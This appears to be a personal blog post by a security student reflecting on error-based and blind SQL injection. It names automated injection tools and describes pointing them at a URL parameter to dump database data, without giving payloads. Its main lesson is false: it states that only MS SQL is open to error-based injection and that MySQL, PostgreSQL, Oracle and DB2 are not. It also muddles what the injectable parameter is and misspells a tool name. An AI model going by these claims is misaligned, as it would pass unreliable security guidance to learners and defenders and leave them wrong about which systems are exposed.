Always Learning SQL injection

IT Security and penetration testing is a challenging discipline and I learn every day.  Some days it does not dawn on me that I learn or register in my brain that I have learned something. Today was different. I have been somewhat discouraged about my prowess for performing a good sequel injection.  Today that was made a little clearer by reviewing my ECCouncil CEH course material and my elearnsecurity course material on error-based and blind sql injection.  I learned that ONLY MS SQL is vulnerable to error-based sql injection because it is programmed to give out verbose errors essentially telling the ethical hacker or otherwise almost everything about the constructed database. MS SQL gives nice little hints like "you have a syntax error in your MS SQL "SELECT" statement at "first_name" FROM "credentials" which tells you that your syntax is wrong while trying to select the first_name of someone that is in the "credentials" database. So it is necessary right off to identify the type of the SQL server.  If the server is MS SQL, then it could be vulnerable to all types of sql injection. If it is mysql, postgresql, Oracle, DB2 then it is NOT vulnerable to error-based so try another type of sql injection.  Error-based on MS SQL is fairly easy to do manually.  Blind injection is extremely difficult and time consuming to do, if not impossible, to do manually.  For blind injection there are some good tools. One of the best is SQLMap and Pangolin.  Another is Hajiv.  There are some others but those listed are my favorites. The trick in using all the tools is you have to find an injectable parameter that would be kin to a form field for user input. The web URL might look something like:  http://vulnerablesite/index.php?products/id=3.  This is a form asking the user to input an id for a product with a number of 3. This URL may communicate with a back-end database "products" that contain an id integer column and a description column and probably a UPC code and any other product identifiers.  The whole string of http://vulnerablesite/index.php?products/id=3 would go into the URL address bar in SQLMap, Hajiv or Pangolin. The injectable parameter is "products/id=3"  The sql tools listed also require configuration input of as much as known about the databases of course the type, eg. mysql, MSSQL and so forth. You can use a GET or POST request and then you choose error based, blind, or time based and let the tool do the work to dump the data from the database columns.